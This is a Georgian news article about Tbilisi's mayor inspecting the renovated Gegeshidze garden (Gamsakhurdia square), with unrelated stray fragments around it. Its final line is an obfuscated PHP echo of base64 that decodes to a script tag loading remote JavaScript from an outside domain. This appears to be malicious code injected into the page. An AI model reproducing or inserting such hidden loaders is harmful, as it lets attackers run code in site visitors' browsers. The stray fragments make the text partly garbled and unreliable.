celsiusi
ავერსი შნაიდერი
დედაქალაქის მერმა, კახა კალაძემ, მოადგილე ანდრია ბასილაიასთან ერთად, კონსტანტინე გამსახურდიას სახელობის ახლად რეაბილიტირებული სკვერი, ე.წ. გეგეშიძის ბაღი დაათვალიერა.
 
კახა კალაძის თქმით, სკვერის არეალი გაფართოვდა და რეაბილიტირდა.
 
„ფაქტობრივად, გეგეშიძის ბაღის სარეაბილიტაციო სამუშაოები დასრულებულია. პატარა დეტალები არის გასაკეთებელი, რომელსაც ხვალ მთლიანად დაასრულებენ. ძალიან მნიშვნელოვანი იყო ამ პროექტის განხორციელება, რადგან ეს ბაღი იყო ძალიან მძიმე მდგომარეობაში და სჭირდებოდა განახლება. თქვენ იცით, რომ აქ „ბურგერ ბარი“ იყო, რომელიც აღებულია და ამ ბარის ადგილზე მწვანე სივრცე მოეწყო, რითაც უფრო გაფართოვდა ბაღის არეალი. ერთადერთი, რაც დარჩა, არის კონსტანტინე გამსახურდიას ძეგლი, რომელიც თაბაშირით არის გაკეთებული და ბრინჯაოში ჩამოისხმება. პროექტი მომავალ წელს განხორციელდება, რაც ჩვენი დაპირება იყო“, – განაცხადა კახა კალაძემ.
 
თბილისის მერიის ინფორმაციით, რეაბილიტაციის ფარგლებში, განახლდა საფეხმავლო ბილიკები, განთავსდა თანამედროვე საპარკე ინვენტარი, მოეწყო გარე განათების სისტემა, საბავშვო მოედანი, ვიდეომეთვალყურეობის სისტემა და შადრევანი, ხოლო თარგების გამწვანების მიზნით ჩატარდა ყველა საჭირო ღონისძიება: ტერიტორიაზე მოეწყო სარწყავი სისტემა, შევიდა ნოყიერი მიწის ნაზავი, 1 600 კვადრატულ მეტრ ფართობზე დაიგო ბალახი და დაირგო 600 ძირი, სხვადასხვა სახეობის მწვანე ნარგავი.
 
განხორციელებული სამუშაოების ღირებულება შეადგენს 800 000 ლარს.
 
გაწეულ სამუშაოებს ადგილზე გაეცნენ საქართველოს პარლამენტის წევრი ნოდარ ტურძელაძე, საკრებულოს წევრი ლევან ჯაფარიძე და ვაკის რაიონის გამგებელი დავით კვინიკაძე.
358
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");